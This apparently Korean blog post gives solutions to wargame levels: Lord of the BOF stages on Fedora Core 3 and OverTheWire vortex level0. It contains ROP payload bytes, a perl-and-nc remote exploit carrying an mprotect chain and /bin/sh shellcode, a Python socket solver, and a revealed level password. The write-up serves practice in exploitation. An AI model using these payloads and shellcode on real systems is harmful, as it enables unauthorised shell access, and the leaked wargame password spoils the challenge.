AAAAAAAAAAA¬....................................................................................鄄...............O°,O±TO²ȂO³ׄO¸HO¹Oº#O»ׄ脄
sh-3.00$ my-pass
euid = 504
get down like that
sh-3.00$

 

 

힌트는 got overwrite라고 돼있는데 어떻게 해야할질 모르겠어서

.bss에 system함수 주소와 /bin/sh 문자열 주소를 복사한 후 fake ebp해 풀었습니다

 

 

아래는 문제를 풀면서 작성한 노트입니다

 

/bin/sh  0x833603
system  0x7507c0
.bss  0x080498b0
strcpy@plt 0x08048494
ppr  0x0804854f
leaveret 0x080486e8
fakeebp  .bss-4 ( 0x080498ac )


0x0804852c 0xc0 0x080498b0 \xb0\x98\x04\x08\x2c\x85\x04\x08
0x08048154 0x07 0x080498b1 \xb1\x98\x04\x08\x54\x81\x04\x08
0x080482c8 0x75 0x080498b2 \xb2\x98\x04\x08\xc8\x82\x04\x08
0x080484d7 0x00 0x080498b3 \xb3\x98\x04\x08\xd7\x84\x04\x08

0x08048148 0x03 0x080498b8 \xb8\x98\x04\x08\x48\x81\x04\x08
0x080481e0 0x36 0x080498b9 \xb9\x98\x04\x08\xe0\x81\x04\x08
0x08048523 0x83 0x080498ba \xba\x98\x04\x08\x23\x85\x04\x08
0x080484d7 0x00 0x080498bb \xbb\x98\x04\x08\xd7\x84\x04\x08

strcpy + plt \x94\x84\x04\x08\x4f\x85\x04\x08

\xb0\x98\x04\x08\x2c\x85\x04\x08
\xb1\x98\x04\x08\x54\x81\x04\x08
\xb2\x98\x04\x08\xc8\x82\x04\x08
\xb3\x98\x04\x08\xd7\x84\x04\x08
\xb8\x98\x04\x08\x48\x81\x04\x08
\xb9\x98\x04\x08\xe0\x81\x04\x08
\xba\x98\x04\x08\x23\x85\x04\x08
\xbb\x98\x04\x08\xd7\x84\x04\x08

\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08

 

 


dark_eyes -> hell_fire

워게임/Lord Of the BOF 2013.10.10 21:48

 

[dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - hell_fire
 - Remote BOF on Fedora Core 3
 - hint : another fake ebp or got overwriting
 - port : TCP 7777
*/

#include <stdio.h>

int main()
{
 char buffer[256];
 char saved_sfp[4];
 char temp[1024];
 
 printf("hell_fire : What's this smell?\n");
 printf("you : ");
 fflush(stdout);

 // give me a food
 fgets(temp, 1024, stdin);
  
 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, temp);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

 printf("%s\n", buffer);

소스입니다

fgets를 사용하기때문에 stdin으로 fake ebp해 mprotect로 rwx권한을 줘 쉘코드를 실행했습니다

 

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "A"x268, "\x38\x86\x04\x08", "B"x88, "\xf0\xe1\xff\xf6", "\x38\x86\x04\x08", "A"x132, "\x70\x46\x71\x00", "\x58\xe2\xff\xf6", "\x00\xe0\xff\xf6", "\x00\x08\x00\x00", "\x07\x00\x00\x00", "\x90"x300, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"';cat)|nc localhost 7777
hell_fire : What's this smell?
you :

my-pass
euid = 503
sign me up

 

아래는 풀면서 노트한 내용입니다

 

stdin+500으로 fake ebp

stdin = 0xf6ffe000

stdin+500 mprotect (0x714670)
stdin+504 0xf6ffe258
stdin+508 &stdin  (0xf6ffe000)
stdin+512 len  (0x00000800)
stdin+516 prot  (0x00000007)

stdin+600(0xf6ffe258) nop+shellcode

leaveret 0x8048638

mprotect(&stdin, 2048, 7);
 

 


level0 -> level1

워게임/vortex 2013.09.29 23:36

 

import struct
from socket import *  # star import provides socket, AF_INET, SOCK_STREAM
p = lambda x : struct.pack("<Q", x)   # pack as little-endian 64-bit
up = lambda x : struct.unpack("<L", x)  # unpack one little-endian 32-bit value; returns a 1-tuple
host = "vortex.labs.overthewire.org"
port = 5842
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
# Four 1-tuples concatenated with + give (a, b, c, d).
# NOTE(review): recv(4) on a stream socket may return fewer than 4 bytes, in
# which case unpack raises struct.error; read exactly 4 bytes in a loop (or
# via s.makefile().read(4)) to be safe.
a,b,c,d = up(s.recv(4))+up(s.recv(4))+up(s.recv(4))+up(s.recv(4))
s.send(p(a+b+c+d))  # 64-bit pack: the sum of four 32-bit values can exceed 2**32, which "<L" would reject
print s.recv(512)
 

 

Username: vortex1 Password: Gq#qu3bF3 

 


